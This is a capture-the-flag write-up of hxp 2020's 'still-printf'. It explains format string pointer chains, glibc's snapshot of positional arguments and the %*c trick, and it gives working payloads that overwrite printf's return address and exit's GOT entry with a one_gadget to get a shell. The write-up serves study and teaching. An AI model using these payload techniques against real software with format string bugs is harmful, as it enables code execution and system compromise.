Format string exploitation can get much more complex than the simple arbitrary write trick (with %n) everyone knows about. A particularly important concept is the pointer chain, which we employ when we cannot acquire a leak. We will use 2020/hxp/still-printf to demonstrate the idea. You can also read the writeups by redrocket and mem2019. The challenge source is as follows:

#include <stdio.h>
#include <stdlib.h>

int main() {
	char buf[0x30];
	setbuf(stdout, NULL);
	fgets(buf, sizeof(buf), stdin);
	printf(buf);
	exit(0);
}

With mitigations:

RELRO:      No RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        PIE enabled

The buffer is small (48 bytes) and the output is actually printed (as opposed to being piped to /dev/null), so we are already limited in some ways. Getting RCE directly is probably impossible, so we have to find a way to re-run the main function. The two most obvious approaches are overwriting the GOT entry of exit and overwriting the return address of the printf call. Here we opt for the latter. I will use absolute addresses for clarity, but don’t forget they are all subject to ASLR.

Okay, so we will use the classic format string write with %hhn to overwrite the Least Significant Byte (LSByte) of the printf return address, changing 0x5555555550fe (where printf returns) to 0x5555555550c4 (start of main). The return address is located on the stack at 0x7fffffffe238. To write to it with %n, we need the value 0x7fffffffe238 itself to be present somewhere on the stack. It isn’t there by default (we can check with search -p 0x7fffffffe238), so we will have to write it ourselves.

Since we don’t have a stack leak from which to build the value 0x7fffffffe238, we will have to overwrite the two LSBytes of some other stack address that is already on the stack. Thus we need to look for pointer chains. The game plan is as follows (the stack right after stepping into printf):

[figure: stack dump right after stepping into printf]

Argument 15 holds the pointer 0x7fffffffe358, which is the stack slot of argument 41 and currently contains 0x7fffffffe6fa. We will use %15$hn to overwrite the two LSBytes of the value at 0x7fffffffe358, so 0x7fffffffe6fa becomes 0x7fffffffe238. Then we will use %41$hhn to overwrite the LSByte of the value at 0x7fffffffe238 as covered before, changing it to 0x5555555550c4. So we come up with something like this:

payload = b"%57912c%15$hn%140c%41$hhn"
# 0xe238 = 57912; 0xc4 - 0x38 = 140
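
The two padding values in the comment follow from how %hn and %hhn truncate the running character count to 16 and 8 bits. A minimal sketch of that arithmetic (the helper name `pad_to` is made up for illustration):

```python
def pad_to(printed: int, wanted: int, bits: int) -> int:
    """Extra characters to print so the low `bits` bits of the count equal `wanted`."""
    return (wanted - printed) % (1 << bits)

first = pad_to(0, 0xe238, 16)     # %hn stores the low 16 bits of the count
second = pad_to(first, 0xc4, 8)   # %hhn stores the low 8 bits of the count

print(first, second)  # 57912 140
```

The modulo is what lets the second write target a byte (0xc4) that is numerically smaller than the count already printed.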

Unfortunately this doesn’t work. We can see that the first overwrite happened as expected:

[figure: stack dump showing 0x7fffffffe238 stored at 0x7fffffffe358]

However, the return address of the printf call hasn’t been overwritten at all. In fact, if we look at 0x7fffffffe6fa, the old value at 0x7fffffffe358 (i.e. the original argument of %41$n), we can see:

[figure: memory at 0x7fffffffe6fa]

The LSByte is overwritten to c4! What’s going on?

As it turns out, when printf first encounters a positional argument (the %m$<type> syntax), it saves the values of all arguments internally to the args_value array. Since %15$hn is the first positional argument in our payload, this snapshot is taken before its write happens. So when we do %41$n, it uses the original value of 0x7fffffffe6fa rather than the modified one!

The way we will get around this is by reaching the 15th argument without the positional syntax, with b"%c"*14 + b"%n" instead of %15$n, so the first write happens before printf takes its snapshot. We will then use %41$n as normal.

payload = b"%c"*13 + b"%57899c%hn%140c%41$hhn"
#              ^13        ^14  ^15
# 0xe238 = 57912; 57912 - 13 = 57899; 0xc4 - 0x38 = 140
# len(payload) == 0x30
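
The difference between the two payloads can be reproduced with a toy model. This is a deliberately simplified sketch, not glibc's code: it only understands %c, %hn and %hhn, ignores register arguments, and treats memory as a dictionary of 8-byte cells. The addresses are the ones used in the text; placing argument 6 at 0x7fffffffe240 is an assumption inferred from the return address sitting at 0x7fffffffe238.

```python
import re

SPEC = re.compile(r"%(?:(\d+)\$)?(\d*)(c|hhn|hn)")
ARG6 = 0x7fffffffe240  # assumed: first stack argument, right above the return address

def slot(n):
    """Stack address holding argument n (n >= 6)."""
    return ARG6 + 8 * (n - 6)

def toy_printf(fmt, mem):
    printed, next_arg, snapshot = 0, 1, None
    for pos, width, conv in SPEC.findall(fmt):
        if pos and snapshot is None:
            snapshot = dict(mem)          # first "$": all argument values are copied now
        n = int(pos) if pos else next_arg
        if not pos:
            next_arg += 1
        source = mem if snapshot is None else snapshot
        value = source.get(slot(n), 0) if n >= 6 else 0  # register arguments ignored
        if conv == "c":
            printed += max(int(width or 1), 1)
        else:
            mask = 0xffff if conv == "hn" else 0xff
            mem[value] = (mem.get(value, 0) & ~mask) | (printed & mask)
    return mem

def fresh():
    return {
        0x7fffffffe238: 0x5555555550fe,  # return address of printf
        slot(15): 0x7fffffffe358,        # argument 15 points at argument 41's slot
        slot(41): 0x7fffffffe6fa,        # argument 41, the pointer we retarget
    }

positional = toy_printf("%57912c%15$hn%140c%41$hhn", fresh())
sequential = toy_printf("%c" * 13 + "%57899c%hn%140c%41$hhn", fresh())

print(hex(positional[0x7fffffffe238]))  # 0x5555555550fe (untouched)
print(hex(sequential[0x7fffffffe238]))  # 0x5555555550c4 (start of main)
```

In the positional run the stray 0xc4 byte ends up at 0x7fffffffe6fa, matching what the debugger showed.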

Unfortunately, although the buffer is 0x30 bytes long, fgets reads at most 0x2f bytes and uses the last byte for the NUL terminator, making our payload one byte too long in practice. To make our payload one byte shorter we have to introduce another trick.
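
To see the off-by-one concretely, here is a rough Python model of what fgets keeps from the input. The function `fgets_model` is a hypothetical stand-in for illustration, not a binding to the C function:

```python
def fgets_model(data: bytes, size: int) -> bytes:
    """Rough model of C fgets: keep at most size - 1 bytes, stopping after a newline."""
    kept = data[: size - 1]
    newline = kept.find(b"\n")
    return kept if newline == -1 else kept[: newline + 1]

payload = b"%c" * 13 + b"%57899c%hn%140c%41$hhn"
stored = fgets_model(payload + b"\n", 0x30)

print(len(payload), len(stored))  # 48 47
print(stored[-6:])                # b'%41$hh'
```

The final n is cut off, so the last conversion is incomplete and the second write never happens.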

A * in place of the field width tells printf to take the width from an argument, i.e. it’s used in situations like this:

printf("%*c", 10, 'K');
// the output is "         K"

This is useful for us as it advances printf by two arguments. In other words, we can do %*c instead of %c%c, saving exactly one character. However, trouble comes from the fact that we know %c will always print one character, while %*c will print a different number of characters depending on what is currently on the stack. Remember that it’s crucial for us to know the number of printed characters for %n to work.
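
Python's printf-style % operator also accepts * as a width, so the behaviour can be tried without compiling anything. This uses Python's formatter rather than glibc's and is meant only as an illustration of the semantics:

```python
wide = "%*c" % (10, "K")   # the width 10 is taken from the first argument
narrow = "%*c" % (0, "K")  # a width smaller than the output cuts nothing off

print(repr(wide))    # '         K'
print(repr(narrow))  # 'K'
print(len("%c%c") - len("%*c"))  # 1
```

With a width argument of 0 the conversion prints exactly one character, which is the predictable case the exploit needs.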

Looking at the stack:

[figure: stack dump]

The zero at offset 14 would be good, but since %*c takes two arguments it would consume both 14 and 15 (and we need to write through 15). Luckily, looking at the registers:

[figure: register dump]

We can see that r8 has the value zero. r8 and r9 are printf arguments 4 and 5, and we don’t need r9 either, so this is the perfect spot for us to put our %*c, knowing it will print one character. Note that if the width is less than the number of characters to print, all the characters are still printed. Our payload is finally:

payload = b"%c"*3 + b"%*c" + b"%c"*8 + b"%57900c%hn%140c%41$hhn"
#             ^3       ^4,5      ^13        ^14  ^15
# 0xe238 = 57912; 57912 - (3 + 1 + 8) = 57900; 0xc4 - 0x38 = 140
# len(payload) == 0x2f

And we can see that the printf call really does return to the start of main!

Now in practice, to solve this challenge it is useful to replace some of the %c with %p to get some leaks, which will allow us to perform standard arbitrary writes.

payload = "%p"*2+"%c"+"%*c"+"%c"*6+"%p"+"%c"+"%57861c%hn%140c%41$hhn"
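# args: "%p"*2 -> 1,2; "%c" -> 3; "%*c" -> 4,5; "%c"*6 -> 6-11; "%p" -> 12; "%c" -> 13; "%57861c" -> 14; "%hn" -> 15
# 0xe238 = 57912; 57912 - (2*14 + 1 + 1 + 6 + 14 + 1) = 57861 (each %p is assumed to print 14 characters);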
# (0xc4 - 0xe238) % 0x100 = 140
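
The bookkeeping in these comments (which argument %hn lands on, and how many characters were printed before it) is easy to get wrong by hand. Below is a small checker for the three payloads from the text. The function `account` is a hypothetical helper; it assumes every %p prints 14 characters and that the width argument consumed by %*c is 0.

```python
import re

SPEC = re.compile(rb"%(\*|\d*)(c|p|hn)")

def account(fmt: bytes, ptr_len: int = 14):
    """Return (argument index used by the first %hn, characters printed before it)."""
    arg, printed = 0, 0
    for width, conv in SPEC.findall(fmt):
        if conv == b"hn":
            return arg + 1, printed
        if width == b"*":
            arg += 2       # one argument for the width, one for the character
            printed += 1   # assumes the width argument is 0
        else:
            arg += 1
            printed += ptr_len if conv == b"p" else max(int(width or 1), 1)
    raise ValueError("no %hn found")

tail = b"c%hn%140c%41$hhn"
plain = b"%c" * 13 + b"%57899" + tail
star = b"%c" * 3 + b"%*c" + b"%c" * 8 + b"%57900" + tail
leaky = b"%p" * 2 + b"%c" + b"%*c" + b"%c" * 6 + b"%p" + b"%c" + b"%57861" + tail

for name, fmt in (("plain", plain), ("star", star), ("leaky", leaky)):
    print(name, account(fmt), hex(len(fmt)))
```

All three should report argument 15 and 57912 (0xe238) characters; only the first one is 0x30 bytes long and therefore does not fit.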

Then in the second run we will just overwrite the GOT entry of exit with a one_gadget:

target = onegadgets[2]
# overwriting 0x7ffff7|e45ea0| with 0x7ffff7|e508a3|
first_write = target % 0x10000 # bottom two bytes
second_write = ((target >> 16) - first_write) % 0x100
# ^ third LSByte
payload = f"%{first_write}c%9$hn%{second_write}c%10$hhn"
payload = payload.ljust(24,"A").encode()
payload += pack(exe.got['exit']) + pack(exe.got['exit'] + 2)

which is just standard format string AAW (arbitrary address write).
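
For readers without pwntools at hand, the same payload can be sketched with only the standard library. Assumptions: `struct.pack("<Q", ...)` stands in for pwntools' `pack` on amd64, the GOT address 0x555555558018 is made up for illustration, and the guard for `second == 0` is an addition of this sketch (a "%0c" conversion would still print one character and throw the count off).

```python
import struct

def build_got_payload(target: int, got_exit: int) -> bytes:
    first = target & 0xffff                     # low two bytes, written with %hn
    second = ((target >> 16) - first) % 0x100   # padding so the count's low byte is byte 3
    assert first != 0, "a zero padding cannot be expressed with %<n>c"
    if second == 0:
        second = 0x100                          # same low byte, but prints 256 characters
    fmt = f"%{first}c%9$hn%{second}c%10$hhn".ljust(24, "A").encode()
    assert len(fmt) == 24, "the addresses must start exactly at argument 9"
    return fmt + struct.pack("<Q", got_exit) + struct.pack("<Q", got_exit + 2)

target = 0x7ffff7e508a3        # one_gadget address from the comment in the text
got_exit = 0x555555558018      # hypothetical address of exit's GOT entry

payload = build_got_payload(target, got_exit)
print(payload[:24])   # b'%2211c%9$hn%66c%10$hhnAA'
print(len(payload))   # 40
```

The padding characters after the last conversion are printed but no longer matter, since both writes have already happened by then.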

And with a 1/4096 chance (the two-byte partial overwrite of the stack address has to guess 12 ASLR-randomized bits) we get a shell!
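
To get a feel for what a 1/4096 chance means when brute-forcing, here is a quick estimate. It assumes every attempt is independent, which should hold as long as each run is a fresh process with fresh ASLR:

```python
import math

p = 1 / 4096  # success probability of a single run, taken from the text

def success_within(attempts: int) -> float:
    """Probability that at least one of `attempts` independent runs succeeds."""
    return 1 - (1 - p) ** attempts

# Smallest number of attempts that gives at least a 50% chance of a shell.
median = math.ceil(math.log(0.5) / math.log(1 - p))

print(median, round(success_within(4096), 3))
```

The median comes out a bit under three thousand attempts, so the exploit is best wrapped in a retry loop.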

You can find the full exploit here: still-printf.py, and see my writeup for stiller-printf for more format string shenanigans.